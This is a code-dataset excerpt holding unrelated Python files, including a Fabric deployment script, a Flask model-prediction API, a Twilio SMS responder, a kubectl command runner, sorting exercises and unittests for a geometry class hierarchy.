base_path,\n delete=False,\n exclude=[\n '*.pyc',\n '.git',\n '.DS_Store',\n 'visual_changelog.db',\n 'venv',\n 'django_project/static'])\n with cd(os.path.join(code_path, 'django_project')):\n run('touch core/wsgi.py')\n set_media_permissions(code_path)\n set_db_permissions()\n collectstatic()\n fastprint(blue('Your server is now in synchronised to your local project'))\n\n@task\ndef server_to_debug_mode():\n \"\"\"Put the server in debug mode (normally not recommended).\"\"\"\n base_path, code_path, git_url, repo_alias, site_name = get_vars()\n config_file = os.path.join(\n code_path, 'django_project', 'core', 'settings', 'project.py')\n sed(\n config_file,\n 'DEBUG = TEMPLATE_DEBUG = False',\n 'DEBUG = TEMPLATE_DEBUG = True')\n with cd(os.path.join(code_path, 'django_project')):\n run('touch core/wsgi.py')\n set_db_permissions()\n collectstatic()\n fastprint(red('Warning: your server is now in DEBUG mode!'))\n\n@task\ndef server_to_production_mode():\n \"\"\"Put the server in production mode (recommended).\"\"\"\n base_path, code_path, git_url, repo_alias, site_name = get_vars()\n config_file = os.path.join(\n code_path, 'django_project', 'core', 'settings', 'project.py')\n sed(\n config_file,\n 'DEBUG = TEMPLATE_DEBUG = True',\n 'DEBUG = TEMPLATE_DEBUG = False')\n with cd(os.path.join(code_path, 'django_project')):\n run('touch core/wsgi.py')\n set_db_permissions()\n collectstatic()\n fastprint(blue('Note: your server is now in PRODUCTION mode!'))\n\n\n@task\ndef set_db_permissions():\n \"\"\"Set the db so user wsgi has all permissions.\n \"\"\"\n user = 'wsgi'\n dbname = 'changelog'\n grant_sql = 'GRANT ALL ON schema public to %s;' % user\n # assumption is env.repo_alias is also database name\n run('psql %s -c \"%s\"' % (dbname, grant_sql))\n grant_sql = (\n 'GRANT ALL ON ALL TABLES IN schema public to %s;' % user)\n # assumption is env.repo_alias is also database name\n run('psql %s -c \"%s\"' % (dbname, grant_sql))\n grant_sql = (\n 'GRANT ALL ON ALL SEQUENCES IN schema public to %s;' % user)\n run('psql %s -c \"%s\"' % (dbname, grant_sql))\n\n\n@task\ndef get_live_db():\n \"\"\"Get the live db - will overwrite your local copy.\"\"\"\n get_postgres_dump('changelog')\n\n@task\ndef get_live_media():\n \"\"\"Get the live media - will overwrite your local copy.\"\"\"\n base_path, code_path, git_url, repo_alias, site_name = get_vars()\n path = '%s/django_project/media' % code_path\n if not exists(path):\n run('mkdir %s' % path)\n local('rsync -ave ssh %s:%s/django_project/media/* django_project/media/'\n % (env['host_string'], code_path))\n\n@task\ndef collectstatic():\n \"\"\"Collect static using proper path for django-compressor / yuglify.\n\n .. note:: We are using python-node to run node in a virtual environment.\n Node is needed for yuglify, which is in turn needed by\n django-compressor which combines all js resources into a single file\n and all css into a single file. These are 'compiled' but yuglify.\n Yuglify does not appear in the path properly thus we explicitly\n ensure the path points to the node_modules dir before running\n collectstatic.\n\n All the above will prevent run time errors like:\n\n [Django] ERROR: Failed to submit message: u\"ValueError: The file\n 'css/contrib.css' could not be found with .\"\n\n \"\"\"\n command = ('PATH=$PATH:../node_modules/yuglify/bin/:../venv/bin/ '\n '../venv/bin/python manage.py collectstatic --noinput')\n base_path, code_path, git_url, repo_alias, site_name = get_vars()\n with cd(os.path.join(code_path, 'django_project')):\n run(command)\n\n@task\ndef update_migrations():\n \"\"\"Apply any pending south migrations.\n \"\"\"\n command = ('../venv/bin/python manage.py migrate changes')\n base_path, code_path, git_url, repo_alias, site_name = get_vars()\n with cd(os.path.join(code_path, 'django_project')):\n run(command)\n run('touch core/wsgi.py')\n fastprint(green('Note: your server is now has the latest SOUTH '\n 'migrations applied.'))\n","sub_path":"fabfile.py","file_name":"fabfile.py","file_ext":"py","file_size_in_byte":12063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"203613393","text":"from SingleLinkList import Node, SingleLinkList\n\ndef reverseList(head: Node) -> SingleLinkList:\n '''翻转链表'''\n if not head:\n return SingleLinkList()\n # cur 是遍历指针\n cur = head.next\n # pre是cur的前驱节点\n pre = None\n head.next = None\n\n while cur:\n pre = cur\n cur = cur.next\n pre.next = head\n head = pre\n return SingleLinkList(head)\n","sub_path":"language/python/data_structure_python/reverseList.py","file_name":"reverseList.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"23583764","text":"from abc import ABC, abstractmethod\nfrom typing import Union\nimport numpy as np\nfrom torch.utils.data import BatchSampler, RandomSampler\nfrom continual_ai.base import ClassificationDataset\n\n\nclass ClassificationTask(ClassificationDataset):\n def __init__(self, base_dataset: ClassificationDataset, task_labels: np.ndarray, labels_map: np.ndarray,\n batch_size=16):\n\n self.__current_y = 'task'\n self.batch_size = batch_size\n self.__subset = 'train'\n self.index = None\n self.current_batch_size = None\n self.current_sampler = None\n\n self.dataset_labels = []\n self.task_labels = []\n\n x_train, old_y_train, y_train = self.extract_labels(base_dataset,\n labels=task_labels, labels_map=labels_map, split='train')\n x_test, old_y_test, y_test = self.extract_labels(base_dataset,\n labels=task_labels, labels_map=labels_map, split='test')\n x_dev, old_y_dev, y_dev = self.extract_labels(base_dataset,\n labels=task_labels, labels_map=labels_map, split='dev')\n\n super(ClassificationTask, self).__init__(x_train=x_train, y_train=y_train, x_dev=x_dev, y_dev=y_dev,\n x_test=x_test, y_test=y_test, transformer=None,\n target_transformer=None)\n\n self.final_transformer = base_dataset.transformer\n self.final_target_transformer = base_dataset.target_transformer\n\n self._old_y_train = old_y_train\n self._old_y_test = old_y_test\n self._old_y_dev = old_y_dev\n\n self.t2d = dict(zip(y_train, old_y_train))\n self.d2t = dict(zip(old_y_train, y_train))\n\n for i, j in self.t2d.items():\n self.dataset_labels.append(j)\n self.task_labels.append(i)\n\n def extract_labels(self, dataset: ClassificationDataset, labels: np.ndarray, labels_map: np.ndarray, split='train'):\n assert split in ['train', 'test', 'dev']\n getattr(dataset, split)()\n\n if dataset.x is None:\n return dataset.x, dataset.y, dataset.y\n\n idx = np.arange(len(dataset))\n x, y = dataset.data\n\n idx_c = idx[np.in1d(y, labels)]\n\n x = x[idx_c]\n y = y[idx_c]\n\n new_y = labels_map[y]\n\n return x, y, new_y\n\n def set_labels_type(self, s):\n assert s in ['task', 'dataset']\n self.__current_y = s\n\n def _y(self):\n if self.__current_y == 'task':\n y = super(ClassificationTask, self)._y()\n else:\n y = getattr(self, F'_old_y_{self._split}')\n\n return y\n\n def __len__(self):\n return super(ClassificationTask, self).__len__() # // self.batch_size + 1\n\n def __call__(self, batch_size=None, sampler=None):\n self.current_batch_size = batch_size\n return self\n\n def __iter__(self):\n\n batch = self.batch_size\n sampler = RandomSampler(self)\n\n if self.current_batch_size is not None:\n batch = self.current_batch_size\n self.current_batch_size = None\n\n if self.current_sampler is not None:\n sampler = self.current_sampler\n self.current_sampler = None\n\n for idx in BatchSampler(batch_size=batch, sampler=sampler, drop_last=False):\n x, y, idxs = [], [], []\n for i in idx:\n _i, _x, _y = self[i]\n x.append(_x)\n y.append(_y)\n idxs.append(_i)\n\n if self.final_transformer is not None:\n x = self.final_transformer(x)\n\n if self.final_target_transformer is not None:\n y = self.final_target_transformer(y)\n\n yield idxs, x, y\n\n def sample(self, size):\n for idx in BatchSampler(batch_size=size, sampler=RandomSampler(self), drop_last=False):\n x, y, idxs = [], [], []\n for i in idx:\n _i, _x, _y = self[i]\n x.append(_x)\n y.append(_y)\n idxs.append(_i)\n\n if self.final_transformer is not None:\n x = self.final_transformer(x)\n\n if self.final_target_transformer is not None:\n y = self.final_target_transformer(y)\n\n return idxs, x, y\n\n\nclass TasksContainer(ABC):\n def __init__(self, dataset: ClassificationDataset, labels_per_task: int, batch_size: int,\n shuffle_labels: bool = False,\n random_state: Union[np.random.RandomState, int] = None):\n\n self._tasks = list()\n self._current_task = 0\n self.current_batch_size = None\n\n if random_state is None or isinstance(random_state, int):\n self.RandomState = np.random.RandomState(random_state)\n elif isinstance(random_state, np.random.RandomState):\n self.RandomState = random_state\n\n self.generate_tasks(dataset, labels_per_task=labels_per_task, batch_size=batch_size,\n shuffle_labels=shuffle_labels)\n\n for i, t in enumerate(self._tasks):\n setattr(t, 'index', i)\n\n def __len__(self):\n return len(self._tasks)\n\n @abstractmethod\n def generate_tasks(self, dataset: ClassificationDataset, labels_per_task: int, batch_size: int,\n shuffle_labels: bool = False):\n raise NotImplementedError\n\n def add_task(self, task):\n self._tasks.append(task)\n\n @property\n def task(self):\n return self._tasks[self._current_task]\n\n @task.setter\n def task(self, v: int):\n if v > len(self):\n raise ValueError('ERROR (MODIFICARE)')\n self._current_task = v\n\n def __getitem__(self, i: int):\n if i > len(self):\n raise ValueError('ERROR (MODIFICARE)')\n return self._tasks[i]\n\n def __iter__(self):\n for t in self._tasks:\n yield t","sub_path":"continual_ai/cl_settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":6014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"468197040","text":"#!/usr/bin/env python\n\n\nimport os\nimport shutil\nimport sys\n\n\nif not os.environ.get(\"TEST_NOTEBOOKS\"):\n sys.exit(0)\n\nfor each in list(sys.argv[1:]) + [\n \"data.tif\",\n \"data.h5\",\n \"data_trim.h5\",\n \"data_dn.h5\",\n \"data_reg.h5\",\n \"data_sub.h5\",\n \"data_f_f0.h5\",\n \"data_wt.h5\",\n \"data_norm.h5\",\n \"data_dict.h5\",\n \"data_post.h5\",\n \"data_traces.h5\",\n \"data_rois.h5\",\n \"data_proj.h5\",\n \"data.zarr\",\n \"data_trim.zarr\",\n \"data_dn.zarr\",\n \"data_reg.zarr\",\n \"data_sub.zarr\",\n \"data_f_f0.zarr\",\n \"data_wt.zarr\",\n \"data_norm.zarr\",\n \"data_dict.zarr\",\n \"data_post.zarr\",\n \"data_traces.zarr\",\n \"data_rois.zarr\",\n \"data_proj.zarr\",\n \"data_proj.html\"]:\n if os.path.isfile(each):\n os.remove(each)\n elif os.path.isdir(each):\n shutil.rmtree(each)\n","sub_path":"teardown_tests.py","file_name":"teardown_tests.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"55866479","text":"# Wykorzystując komendę with zapisz kilka linijek tekstu do pliku a następnie wyświetl je na ekranie.\n\n\nwith open('zad3.txt', 'w+') as plik: \n plik.write(\"Hello world !\\n\")\n plik.write(\"Witaj świecie !\\n\")\n plik.write(\"Hallo Welt !\\n\") \n\n\nwith open(\"zad3.txt\", \"r\") as plik:\n for linia in plik:\n print(linia, end=\"\")","sub_path":"lab5/zad3.py","file_name":"zad3.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"97764280","text":"def interleave(l):\r\n max_len = max(map(len, l))\r\n formed_list = []\r\n interleaved_list = []\r\n for i in range(len(l)):\r\n diff_len = max_len - len(l[i])\r\n formed_list.append(l[i] + [None]*diff_len)\r\n for i in range(max_len):\r\n for j in range(len(formed_list)):\r\n interleaved_list.append(formed_list[j][i])\r\n none_num = interleaved_list.count(None)\r\n for i in range(none_num):\r\n interleaved_list.remove(None)\r\n return interleaved_list\r\n\r\ndef funky_merge(*objs):\r\n objs = list(objs)[:]\r\n out_obj = {}\r\n used_key = []\r\n all_key = set()\r\n for obj in objs:\r\n for key in obj.keys():\r\n all_key = all_key | set(key)\r\n for key in all_key:\r\n all_list = []\r\n all_obj = []\r\n value_type = ''\r\n for j in range(len(objs)):\r\n value = objs[j].get(key)\r\n value_type = type(value)\r\n if not value:\r\n continue\r\n if value_type is int:\r\n out_obj[key] = value\r\n if value_type is list:\r\n all_list.append(value)\r\n if value_type is dict:\r\n all_obj.append(value)\r\n if value_type is list:\r\n interleaved_list = interleave(all_list)\r\n out_obj[key] = interleaved_list\r\n if value_type is dict:\r\n out_obj[key] = funky_merge(*all_obj)\r\n return out_obj\r\n\r\ndef main():\r\n obj1 = {\"a\":1,\"b\":{\"c\":2,\"d\":[2,0],\"e\":4}}\r\n obj2 = {\"a\":2,\"b\":{\"c\":1,\"d\":[1,2,3],\"f\":5}}\r\n obj3 = {\"b\":{\"d\":[4]}}\r\n data = [obj1,obj2,obj3]\r\n\r\n result = funky_merge(*data)\r\n print(result)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"others/funky_merge/funky_merge.py","file_name":"funky_merge.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"35658968","text":"import sys\nfrom flask import Flask\nfrom flask import jsonify\nfrom flask_restful import Api\nfrom flask_restful import Resource\nfrom flask_restful import reqparse\nfrom sklearn.externals import joblib\nimport pandas as pd\n\n\napp = Flask(__name__)\napi = Api(app)\nparser = reqparse.RequestParser()\nparser.add_argument(\"sample_uuid\", type=str)\n# add features for model\nfor feature in ['approx_payout_date', 'body_length', 'channels', 'event_created', 'event_end', 'event_start',\n 'fb_published', 'has_analytics','has_logo', 'name_length', 'num_order', 'num_payouts', 'object_id',\n 'sale_duration2', 'show_map', 'user_age', 'user_created', 'user_type']:\n parser.add_argument(feature, type=int)\n\n\nclass Predict(Resource):\n def __init__(self, *args, **kwargs):\n super(Predict, self).__init__(*args, **kwargs)\n self.model_file = 'api/best_model.pkl'\n self.load_model()\n\n def get(self):\n arguments = parser.parse_args()\n # transform to pandas and remove user id\n arguments_df = pd.DataFrame.from_dict(arguments, orient='index').T\n arguments_df.pop('sample_uuid')\n result = {\n 'probability': self.model.predict_proba(arguments_df)[0, 1],\n 'label': int(self.model.predict(arguments_df)[0]),\n 'sample_uuid': arguments['sample_uuid'],\n }\n return jsonify(**result)\n\n def load_model(self):\n self.model = joblib.load(self.model_file)\n return self\n\n\napi.add_resource(Predict, '/api/v1/predict')\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', debug=False, port=5000)","sub_path":"api/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"270268741","text":"# /usr/bin/env python\n\n'''\nThis acts like a server\n'''\nfrom flask import Flask, request\nfrom twilio.twiml.messaging_response import MessagingResponse\n# My common methods\nfrom commonMethods import *\n\n# This can be any service/product/customer care/emergency services number\n# twilioNumber = \"yyy\"\n# customerNumber = \"xxx\"\n\napp = Flask(__name__)\n\n@app.route(\"/sms\", methods=['GET', 'POST'])\ndef sms_reply():\n \"\"\"Respond to incoming messages and create a conversation\"\"\"\n txMsgBody = \"\"\n\n rxFromNumber = request.values.get('From')\n rxMsgBody = request.values.get('Body')\n rxMsgBody = rxMsgBody.capitalize()\n\n if any( [rxMsgBody == \"Yes\", rxMsgBody == \"Y\"] ):\n txMsgBody += \"Great! \"\n elif any( [rxMsgBody == \"No\", rxMsgBody == \"N\"] ):\n txMsgBody += \"Okay. I'll check with next in line\"\n else:\n txMsgBody += \"Do you mind getting with Shrek? \"\n\n # Start our response\n resp = MessagingResponse()\n\n # Add a message\n txMsgBody += greetingString('end')\n resp.message(txMsgBody)\n\n return str(resp)\n\nif __name__ == \"__main__\":\n app.run(debug=True)","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"330175909","text":"#!/usr/bin/env python\nimport argparse\nfrom rhscripts.conversion import rtx_to_nii\nfrom rhscripts.version import __show_version__\n\n\n__scriptname__ = 'rtx2nii'\n__version__ = '0.0.1'\n\n##\n# RTX2NII python script\n# VERSIONS:\n# - 0.0.1 :: 2021-06-15 : Added script as a copy of rtx2mnc\n\nparser = argparse.ArgumentParser(description='RTX2NII.')\nparser.add_argument('RTX', help='Path to the DICOM RTX file', nargs='?')\nparser.add_argument('container', help='Path to the Nifty container file', nargs='?')\nparser.add_argument('output', help='Path to the OUTPUT Nifty RT file', nargs='?')\nparser.add_argument('--behavior', help='Choose how to convert to polygon. Options: default, mirada',type=str,default='default')\nparser.add_argument(\"--verbose\", help=\"increase output verbosity\", action=\"store_true\")\n#parser.add_argument(\"--copy_name\", help=\"Copy the name of the RTstruct (defined in Mirada) to the tag dicom_0x0008:el_0x103e of the MNC file\", action=\"store_true\")\nparser.add_argument(\"--version\", help=\"Print version\", action=\"store_true\")\n\nargs = parser.parse_args()\n\nif args.version:\n\tprint('%s version: %s' % (__scriptname__,__version__))\n\t__show_version__()\n\texit(-1)\n\nif not args.RTX or not args.container or not args.output:\n\tparser.print_help()\n\tprint('Too few arguments')\n\texit(-1)\n\nrtx_to_nii(dcmfile=args.RTX,\n nii_container_file = args.container,\n nii_output_file = args.output,\n behavior=args.behavior,\n verbose=args.verbose,\n copy_name=False) # not yet implemented\n","sub_path":"conversion/rtx2nii.py","file_name":"rtx2nii.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"545575598","text":"# -*- coding: utf-8 -*-\n\"\"\"\nThis module contains the slc.shoppinglist package\n\"\"\"\nimport os\nfrom setuptools import setup, find_packages\n\ndef read(*rnames):\n return open(os.path.join(os.path.dirname(__file__), *rnames)).read()\n\nversion = '1.5'\n\nlong_description = (\n read('README.txt')\n + '\\n' +\n 'Change history\\n'\n '**************\\n'\n + '\\n' +\n read('CHANGES.txt')\n + '\\n' +\n 'Detailed Documentation\\n'\n '**********************\\n'\n + '\\n' +\n read('slc', 'shoppinglist', 'README.txt')\n + '\\n' +\n 'Contributors\\n'\n '************\\n'\n + '\\n' +\n read('CONTRIBUTORS.txt')\n + '\\n' \n )\n\nsetup(name='slc.shoppinglist',\n version=version,\n description=\"A shoppinglist of UIDs\",\n long_description=long_description,\n # Get more strings from http://www.python.org/pypi?%3Aaction=list_classifiers\n classifiers=[\n \"Framework :: Plone\",\n \"Programming Language :: Python\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n \"License :: OSI Approved :: GNU General Public License (GPL)\",\n \"License :: OSI Approved :: European Union Public Licence 1.1 (EUPL 1.1)\",\n ],\n keywords='',\n author='syslab.com',\n author_email='thomas@syslab.com',\n url='http://www.syslab.com',\n license='GPL + EUPL',\n packages=find_packages(exclude=['ez_setup']),\n namespace_packages=['slc'],\n include_package_data=True,\n zip_safe=False,\n install_requires=[\n 'setuptools',\n # -*- Extra requirements: -*-\n ],\n extras_require={\n 'test': [\n 'plone.app.testing',\n 'mock',\n ],\n },\n entry_points=\"\"\"\n [z3c.autoinclude.plugin]\n target = plone\n \"\"\",\n )\n","sub_path":"pypi_install_script/slc.shoppinglist-1.5/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"438540821","text":"\"\"\"\n@author: wangyaxiong\n@time: 2018/10/31\n@desc:1、发送请求 2、断言返回结果 3、记录并返回所有、成功、失败、错误用例数\n\n\"\"\"\n\nimport json,os,yaml\nfrom mylib.getcase import GetCase\nfrom mylib.myrequest import MyRequest\nfrom mylib.getconf import GetConf\nfrom mylib.mylog import logger\n\nclass SendRequest:\n\n def __init__(self,server,method,contentType,secret,path,params,exceptResult,env):\n self.server = server\n self.method = method\n self.contentType = contentType\n self.secret = secret\n self.path = path\n self.params = params\n self.exceptResult = exceptResult\n self.env = env\n self.dir = os.path.dirname(os.path.dirname(__file__))\n self.yamlFile = os.path.join(self.dir,'conf','conf.yaml')\n \n def get_conf(self):\n try:\n with open(self.yamlFile,'r',encoding='UTF-8') as f:\n yamlLoad = yaml.load(f)\n except Exception as e:\n logger.error('获取配置失败,原因:{}'.format(e))\n else:\n return yamlLoad\n\n def assertRequest(self):\n result = []\n successCaseNo = 0\n failureCaseNo = 0\n errCaseNo = 0\n allCaseNo = 0\n req = MyRequest()\n conf = self.get_conf()\n url = conf[self.env]['url']\n for i in range(0,len(self.method)):\n complete_url = 'http://' + self.server[i] + url + self.path[i]\n accessKey = conf[self.env][self.server[i]]['accessKey']\n if self.method[i] == 'POST' and self.contentType[i] == 'x-www-form-urlencoded' and self.secret[i] == 'no':\n result1 = req.postForm(complete_url,self.params[i])\n resultToJson = json.loads(self.exceptResult[i])\n if result1 == 'error':\n errCaseNo += 1\n allCaseNo += 1 \n result.append('ERROR')\n elif result1 != resultToJson :\n failureCaseNo += 1\n allCaseNo += 1\n result.append('FAILURE')\n logger.info('不符合预期,期望结果:{},实际结果:{}'.format(result1,resultToJson))\n elif result1 == resultToJson :\n successCaseNo += 1\n allCaseNo += 1\n result.append('SCCESS')\n logger.info('符合预期,期望结果:{},实际结果:{}'.format(result1,resultToJson))\n elif self.method[i] == 'POST' and self.contentType[i] == 'json' and self.secret[i] == 'yes':\n result1 = req.post_json_sign(complete_url,self.server[i],accessKey,self.params[i])\n resultToJson = json.loads(self.exceptResult[i])\n if result1 == 'error':\n errCaseNo += 1\n allCaseNo += 1\n result.append('ERROR')\n elif result1 != resultToJson :\n failureCaseNo += 1\n allCaseNo += 1\n result.append('FAILURE')\n logger.info('不符合预期,期望结果:{},实际结果:{}'.format(result1,resultToJson))\n elif result1 == resultToJson :\n successCaseNo += 1\n allCaseNo += 1\n result.append('SCCESS')\n logger.info('符合预期,期望结果:{},实际结果:{}'.format(result1,resultToJson))\n else:\n errCaseNo += 1\n allCaseNo += 1\n result.append('ERROR') \n \n return allCaseNo,successCaseNo,failureCaseNo,errCaseNo,result\n \nif __name__ == \"__main__\":\n filepath = r\"d:\\apiTest\\data\\case.xlsx\"\n sheet = 'customer'\n get_case = GetCase()\n env = 'test231'\n caseid,name,method,contentType,module,path,params,exceptResult = get_case.readExcel(filepath,sheet)\n SendRequest(caseid,name,method,contentType,module,path,params,exceptResult,env).assertRequest()\n\n # caseid,name,method,contentType,path,params,assertion = readExcel(filepath,\"Sheet1\")\n # print(caseid,name,method,contentType,path,params,assertion)\n\n\n\n","sub_path":"mylib/sendRequest.py","file_name":"sendRequest.py","file_ext":"py","file_size_in_byte":4196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"354610789","text":"\"\"\"\nChallenge #34 Intermediate\n Your task today is show the implementation of two sorting algorithms Stooge sort and Bogosort in anyway you like!\n\"\"\"\nfrom random import shuffle\n\n\ndef is_sorted(arr):\n for x, y in zip(arr, arr[1:]):\n if x > y:\n return False\n return True\n\n\ndef bogosort(arr):\n shuffle(arr)\n while not is_sorted(arr):\n shuffle(arr)\n return arr\n\n\ndef stooge_sort(arr, j, i=0):\n if arr[j] < arr[i]:\n tmp = arr[j]\n arr[j] = arr[i]\n arr[i] = tmp\n if j - i + 1 > 2:\n t = (j - i + 1) // 3\n stooge_sort(arr, i, j - t)\n stooge_sort(arr, i + t, j)\n stooge_sort(arr, i, j - t)\n\n return arr\n\n\nif __name__ == '__main__':\n l = [3, 1, 5, 4, 2]\n print(bogosort(l))\n print(stooge_sort(l, len(l) - 1))\n","sub_path":"challenge_0034.py","file_name":"challenge_0034.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"166393282","text":"# https://atcoder.jp/contests/abc146/tasks/abc146_c\nimport sys\nsys.setrecursionlimit(2147483647)\nINF=float(\"inf\")\nMOD=10**9+7\ninput=lambda :sys.stdin.readline().rstrip()\n\ndef bisection(l,r,f,left=True,discrete=True):\n eps=1 if discrete else 10**-12\n if((not left)^f(r)): return r if left else r+1\n elif(left^f(l)): return l-1 if left else l\n while(r-l>eps):\n h=(l+r)//2 if discrete else (l+r)/2\n if((not left)^f(h)): l=h\n else: r=h\n return (l+r)/2 if not discrete else l if left else r\n\nfrom math import log10\n\ndef resolve():\n a,b,x=map(int,input().split())\n def check(n):\n return a*n+b*(int(log10(n))+1)<=x\n print(bisection(1,10**9,check))\nresolve()\n","sub_path":"ABC146/c_buy_an_integer.py","file_name":"c_buy_an_integer.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"293170530","text":"import os, subprocess, string, sys;\n\nenvironment_var = os.getenv('PLUGIN_KUBECTL_COMMANDS', '')\n\nreturncode = 0\nif environment_var:\n commands = string.split(environment_var, \",\")\n\n for command in commands:\n try:\n p = subprocess.Popen('kubectl ' + str(command), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=os.environ)\n (out,err) = p.communicate()\n if p.returncode == 0:\n print (\"command kubectl %s succeeded, returned: %s\" % (str(command),str(out)))\n elif p.returncode <= 125:\n print (\"command kubectl %s failed, exit-code=%d error = %s\" % (str(command), p.returncode, str(err)))\n returncode = p.returncode\n elif p.returncode == 127:\n print (\"Not found\")\n returncode = p.returncode\n else:\n sys.exit(\"'%s' likely crashed, shell retruned code %d\" % (cmd,e.returncode))\n except OSError as e:\n print(\"Execution failed:\", e)\n\nif returncode > 0:\n sys.exit(1)\n","sub_path":"python/run_commands.py","file_name":"run_commands.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"146595974","text":"#!/usr/bin/python3\n\"\"\"Unittest for base file: class and methods\"\"\"\n\nimport pep8\nimport unittest\nimport os\nimport json\nfrom models import base\nfrom models.base import Base\nfrom models.rectangle import Rectangle\nfrom models.square import Square\n\n\nclass Test_Base_outputs(unittest.TestCase):\n \"\"\"Test_Base_outputs test for Base class\"\"\"\n\n def test_id_setting(self):\n \"\"\"test_id_setting method that test the setting of id\n and it's output\"\"\"\n Base._Base__nb_objects = 0\n\n base_1 = Base()\n self.assertEqual(base_1.id, 1)\n\n base_2 = Base()\n self.assertEqual(base_2.id, 2)\n\n base_3 = Base(4)\n self.assertEqual(base_3.id, 4)\n\n base_4 = Base()\n self.assertEqual(base_4.id, 3)\n\n base_5 = Base(-4)\n self.assertEqual(base_5.id, -4)\n\n base_6 = Base(None)\n self.assertEqual(base_6.id, 4)\n base_6 = Base(None)\n self.assertEqual(base_6.id, 5)\n\n def test_to_json_string(self):\n \"\"\"test_to_json_string test the output of the staticmethod\n of Base class\"\"\"\n Base._Base__nb_objects = 0\n\n python_dict = {'id': 1, 'x': 3, 'y': 2, 'width': 1, 'height': 2}\n json_string = Base.to_json_string([python_dict])\n self.assertEqual(type(json_string), str)\n self.assertEqual(type(python_dict), dict)\n\n # test empty dict\n python_dict = {}\n json_string = Base.to_json_string(python_dict)\n self.assertEqual(type(json_string), str)\n self.assertEqual(type(python_dict), dict)\n\n def test_save_to_file(self):\n \"\"\"test_save_to_file test the output of the classmethod\"\"\"\n Base._Base__nb_objects = 0\n\n # test if the file was created\n Rec1 = Rectangle(2, 3)\n Rec2 = Rectangle(3, 4)\n Rectangle.save_to_file([Rec1, Rec2])\n self.assertEqual(os.path.exists(\"Rectangle.json\"), True)\n\n Sq1 = Square(3)\n Sq2 = Square(4)\n Square.save_to_file([Rec1, Rec2])\n self.assertEqual(os.path.exists(\"Square.json\"), True)\n\n def test_from_json_string(self):\n \"\"\"test_from_json_string test the output of staticmethod\"\"\"\n Base._Base__nb_objects = 0\n\n python_dict_list = []\n dict1 = {'id': 1, 'x': 4, 'y': 2, 'width': 1, 'height': 2}\n dict2 = {'id': 2, 'x': 3, 'y': 2, 'width': 1, 'height': 2}\n python_dict_list.append(dict1)\n python_dict_list.append(dict2)\n json_string = Rectangle.to_json_string(python_dict_list)\n list_output = Rectangle.from_json_string(json_string)\n self.assertEqual(list_output, python_dict_list)\n\n python_dict_list = []\n json_string = Rectangle.to_json_string(python_dict_list)\n list_output = Rectangle.from_json_string(json_string)\n self.assertEqual(list_output, python_dict_list)\n # Consider input not as a json string\n\n def test_create(self):\n \"\"\"test_create test output of classmethod\"\"\"\n Base._Base__nb_objects = 0\n\n Rec1 = Rectangle(3, 2)\n Rec2_copy = Rectangle.create(**Rec1.to_dictionary())\n self.assertEqual(Rec1.to_dictionary(), Rec2_copy.to_dictionary())\n self.assertEqual(Base._Base__nb_objects, 2)\n\n Sq1 = Square(4)\n Sq2_copy = Square.create(**Sq1.to_dictionary())\n self.assertEqual(Sq1.to_dictionary(), Sq2_copy.to_dictionary())\n self.assertEqual(Base._Base__nb_objects, 4)\n\n # testing from not create instance\n Base._Base__nb_objects = 0\n\n dict_R1 = {'width': 3, 'height': 7, 'x': 3, 'y': 4, 'id': 2}\n Rec1 = Rectangle.create(**dict_R1)\n self.assertEqual(Rec1.to_dictionary(), dict_R1)\n self.assertEqual(Base._Base__nb_objects, 1)\n\n dict_S1 = {'size': 6, 'x': 1, 'y': 3, 'id': 5}\n Rec1 = Rectangle.create(**dict_R1)\n self.assertEqual(Rec1.to_dictionary(), dict_R1)\n self.assertEqual(Base._Base__nb_objects, 2)\n\n def test_load_from_file(self):\n \"\"\"test_load_from_file test classmethod output\"\"\"\n\n Base_Base__nb_objects = 0\n R1 = Rectangle(4, 7)\n R2 = Rectangle(6, 9)\n R1_d = R1.to_dictionary()\n R2_d = R2.to_dictionary()\n list_obj = [R1, R2]\n Rectangle.save_to_file(list_obj)\n list_instances = Rectangle.load_from_file()\n\n self.assertIsInstance(list_instances[0], Rectangle)\n self.assertIsInstance(list_instances[1], Rectangle)\n\n self.assertDictEqual(list_instances[0].to_dictionary(), R1_d)\n self.assertDictEqual(list_instances[1].to_dictionary(), R2_d)\n\n\nclass TestBasepep8(unittest.TestCase):\n \"\"\"Validate pep8\"\"\"\n\n def test_pep8(self):\n \"\"\"test for base file and test_base file pep8\"\"\"\n style = pep8.StyleGuide(quiet=True)\n base = 